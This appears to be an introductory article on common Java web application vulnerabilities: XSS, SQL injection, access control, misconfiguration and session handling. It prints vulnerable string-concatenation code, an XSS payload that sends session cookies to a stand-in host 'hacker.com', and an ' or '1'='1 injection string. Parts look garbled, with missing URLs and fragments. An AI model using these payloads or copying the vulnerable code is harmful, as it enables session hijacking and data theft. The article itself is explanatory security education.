With the proliferation of internet 2.0, the frequent usage of networks makes internet applications prone to a spread of threats. According to a survey by Cenzic in 2014, 96% of tested applications have vulnerabilities. According to a Cisco survey that was conjointly conducted in 2015, 50,000 network intrusions are found on a daily basis.
Hackers can potentially take various types of paths through your application to cause risks to your business. So such threats need to be evaluated for instance, identify the threat agents, security measures, its technical impacts and thus ultimately the business impacts threats may cause. A traditional firewall is not capable of detecting application layer (layer 7) traffic. . For example, a valid user being able to access functionality that she/he is not authorized for.
A few computer security vulnerabilities in Java-based web applications with their attack scenarios & prevention steps are mentioned in brief below:
Figure: The Vulnerability of Web Applications
Figure: Web Attack methods
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) flaws occur if application takes non-trusted data & pass it to browser without suitable validations/escaping. It allows an attacker to run malicious scripts in the host’s browser. Possible problems could be hijacking user sessions, defacing web sites, invalid redirects & forwards.
Hacker might utilize malicious data in developing following HTML code without validation or escaping:
(String) page += “<input name=’myaccountname’ type=’TEXT’ value=’” + request.getParameter (“FF”) + “‘>”;
The eve-dropper changes the ‘FF’ parameter in their browser to:
<Script> document. Location= ‘http://www.hacker.com/cgi-bin/cookie.cgi?param=’
This will permit transferring of victim’s session ID to hacker’s site and thus they can misuse it for access.
It is a coding way, used to hack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.
The software uses malicious data in developing the below suspicious SQL query:
String query = “SELECT * FROM branches WHERE branchID=’”+ request.getParameter (“name”) + “‘”;
Eve-dropper can change this name parameter and append ‘or ‘1’=’1 which alters query and enables fetching of all records.
Missing Function Level Access Control
Usually function level access rights got verified which permits that functionality to appear in the UI. Also, similar access control checks are done on the server when each function is accessed. Hackers will forge requests in order to access functionality without legal authorization, if requests are not checked.
The attacker simply forces browser to hit target URLs. Say the below URLs require authentication and admin rights are also required for access to admin_getAppAccess page
If a non-admin unauthenticated user can access either page, that’s a flaw
Proper security needs to have a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Like secure and robust configuration settings should be defined, implemented, and maintained, as default configurations are often easily attacked. Also, software should be up to date.
For instance, admin console of app server is automatically installed and not removed. Default accounts remain same. Hacker finds the standard admin pages are on your server, logs in with default key/passwords, and takes over access.
Broken Authentication & Session Management
Application functions in relation with authentication and session management are often not properly implemented as expected, permitting hackers to assume other users’ identities by compromising keys, passwords or session tokens, or to exploit other implementation flaws.
For instance, Hotel reserving application supports URL rewriting, embedding session IDs in the URL:
A legal user of the site wants to let his colleagues know about the purchases. The above link if e-mailed then without being aware of the fact that he is also giving away his session ID. When his colleagues use the link they will use his session and debit card.
Web applications span a wider, less-trusted user-base than legacy client-server applications, and still they are more vulnerable to threats. Organizations are taking initiatives to prevent these types of break-ins and for the same, organizations are handling this menace via some ways like code reviews, extensive penetration testing, and intrusion detection systems. To reduce these threats, applications should be redesigned by considering the above-mentioned prevention steps to lead to more secure, robust businesses.